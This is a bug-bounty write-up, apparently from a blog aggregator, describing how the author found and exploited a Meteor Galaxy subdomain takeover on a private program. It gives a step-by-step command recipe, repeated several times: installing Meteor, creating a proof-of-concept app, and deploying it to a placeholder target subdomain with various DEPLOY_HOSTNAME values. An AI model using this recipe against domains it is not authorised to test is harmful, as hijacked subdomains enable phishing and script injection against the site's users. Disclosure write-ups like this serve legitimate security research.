.png)
3 months ago
45 BOOK THIS SPACE FOR AD
ARTICLE AD
In the name of Allah
Hi guy, I’m here again, YoungVanda. In this write-up I’m gonna talk about Meteor Subdomain Takeover. From a simple recon to one of the trickiest exploitations of my life 😉
In this write-up, I explained everything from the beginning. If you just one to get to the exploitation part, check out Exploitation heading at the end.
Also if you haven’t read this write-up, give it a go. It’s a good write-up and it helped me a lot during the exploitation process.
It was a private program, with this scope: *.redacted.com
First thing I do when facing a small company/target, is just running Konckpy to get the vibe of domain. Like:
I ran Knockpy and it gave me a few subdomains I just opened them manually.
I use this Firefox extension for opening URLs manually, at the same time.I found an interesting subdomain.
When I saw this page I said OK usually these kinda messages could be a sign of Subdomain Takeover. I’m not a big fan of Subdomain Takeover, but I said why not!!! Let’s dive into it 🔥🔥🔥
For whose don’t know what is Subdomain Takevoer
What is Subdomain Takeover?
Write here ….
Note:
When I face such a web pages and I think it might be vulnerable to Subdomain Takeover, I usually check can-i-take-over-xyzAlso, I run Nuclei for this purpose😁 Because Nuclei has lots of community templates when it comes to Subdomain Takeover.Back to the story, I ran Nuclei, after a second Nuclei told me, You’re a lucky boy😁 Just get out here man. Get out here.
Why no ones has reported this before?
can-i-take-over-xyz hadn’t had the Meteor Takeover in its resources.There was no write-up about it, except one. And you could not find it with Googling.The only write-up was placed in the Nuclei template. Even, I followed the write-up. Went step by step. But it didn’t work.How did I find the write-up?
In every Nuclei template there usually extra information about it. Even the way you can exploit the vulnerability. So here what I did to find the write-up:
find . -name "template-name.yaml"
cat ./http/takeovers/template-name.yaml
Step — 1:
So I found the write-up, the first thing I did according to the write-up was installing Meteor:
What is Metor?
Right here…
# Other ways here: https://docs.meteor.com/install.html# I installed this way
curl https://install.meteor.com/ | sh
Step — 2:
Next step is creating Meteor application. I used this command:
# Execute the command with a normal user, not root.mkdir poc && cd poc
meteor create --minimal .
Note:
For creating a Meteor application you shouldn’t be root user. That was one of my problems, so to make this work I used my Amazon VPS with a ubuntu/normal user.
Step — 3:
So far, all the required files have been created. Go and change this file
client/main.html and put your flag there:
<platform-uesrname> POC Takeover
Step — 4:
Now, go to the www.meteor.com and sign-up. Also take note that you should put your payment details to be able use the custom subdomain feature.
meteor login # Enter your username & passwordStep — 5:
It’s time for final step.
DEPLOY_HOSTNAME=[CNAME] meteor deploy [sub.target.com]In [CNAME] section you can put CNAME of your subdomain.
dig sub.target.comBut in my case it didn’t work. You can try these:
# Didn't work for meDEPLOY_HOSTNAME=eu-west-1.galaxy.meteor.com meteor deploy [sub.target.com]
# Didn't work for me
DEPLOY_HOSTNAME=u-west-1.galaxy-ingress.meteor.com meteor deploy [sub.target.com]
# Worked for me
DEPLOY_HOSTNAME=galaxy.meteor.com meteor deploy [sub.target.com]
How I found this galaxy.meteor.com
I was disappointed that I couldn’t takeover the subdomain. Even though I spent around 10 hours, in two days, to exploit the vulnerability, but I wasn’t successful. However, suddenly, I came up with an idea, but to me this was more like a shot in the dark :)
I discussed my problem on forums.meteor.com just asking for some help :)
Finally after 2 days of exploiting and 3 days of waiting for some help. It worked !!!
Man, the moment I realised that the application is being deployed I was over the moon.
It was marvellous. Like a beautiful woman in a red dress with red lipstick
Like this woman:
Ohhh, my bed, sorry, I meant this one:
Ultimate Final Hot Cooking Recipe:
Ohhh, Mamacita, what a recipe !!! Yummy 😂😂😂# Follow the steps with normal user, not root.curl https://install.meteor.com/ | sh
mkdir poc && cd poc
meteor create --minimal .
nano client/main.html # Put your <platform-username> POC Takeover
meteor login # Entering username and password - Sign-up here www.meteor.com
dig sub.target.com # Get the CNAME
# Try this one now:
DEPLOY_HOSTNAME=CNAME meteor deploy sub.target.com
# If didn't work, try this one:
DEPLOY_HOSTNAME=galaxy-ingress.meteor.com meteor deploy sub.target.com
# Didn't work, try this one:
DEPLOY_HOSTNAME=u-west-1.galaxy-ingress.meteor.com meteor deploy sub.target.com
# Didn't work, try this one: ( this oen worked for me )
DEPLOY_HOSTNAME=galaxy.meteor.com meteor deploy sub.target.com
# Ceck out https://galaxy-guide.meteor.com/deploy-region.html for more regions
# If you still having problem with deploying the target. Do the trick !!!
# Go to https://forums.meteor.com and ask for some help
Severity/Priority of this Takeover
It was a private RDP program so I really tried to escalate it to High/P2 by showing the scenario of Stored XSS. But it didn’t work. They closed it as Medium/P3.
Triager said this:
The Errors you might get during the takeover
After installing Meteor create a directory and run following steps on that directorycurl https://install.meteor.com/ | shmkdir poc && cd pocCreate the Meteor application in a new directory and as a normal user, not root. Otherwise you gonna get this error:
ubuntu@369:~/poc$ meteor create --minimal .The last error that you might encounter, is gonna happen while deploying the application:dig sub.target.com # Get the CNAME
# Try this one now:
DEPLOY_HOSTNAME=CNAME meteor deploy sub.target.com
# If didn't work, try this one:
DEPLOY_HOSTNAME=galaxy-ingress.meteor.com meteor deploy sub.target.com
# Didn't work, try this one:
DEPLOY_HOSTNAME=u-west-1.galaxy-ingress.meteor.com meteor deploy sub.target.com
# Didn't work, try this one: ( this oen worked for me )
DEPLOY_HOSTNAME=galaxy.meteor.com meteor deploy sub.target.com
# Ceck out https://galaxy-guide.meteor.com/deploy-region.html for more regions
# If you still having problem with deploying the target. Do the trick !!!
# Go to https://forums.meteor.com and ask for some help
Moral Values of Story
The moment I realised that I’m not able to takeover the subdomain, after 7 8 hours of trying. I was really sad and just watched anime. I used to be lazy when it came to exploitation. But I didn’t give up, the next day:I watched multiple YouTube videos. About how to deploy a Meteor application and even the Meteor itself.Reading documents, from docs.meteor.com, just to figure out what’s going on.Finally, when I was disappointed. I explained my problem on the forum, forums.meteor.com, I have waited for 2 or 3 days. And finally someone answered my question and it actually worked.Uooo man… Wait a minute, I tweet about my recent findings and some other bug bounty tips. So check out my tweeter account . Sorry X account :)
My Twitter Account: @young_vanda_
https://rivalsec.github.io/blog/2022/12/02/meteor.htmlhttps://galaxy-guide.meteor.com/deploy-region.htmlhttps://forums.meteor.comhttps://www.meteor.com/
Bengali (Bangladesh) · 
English (United States) ·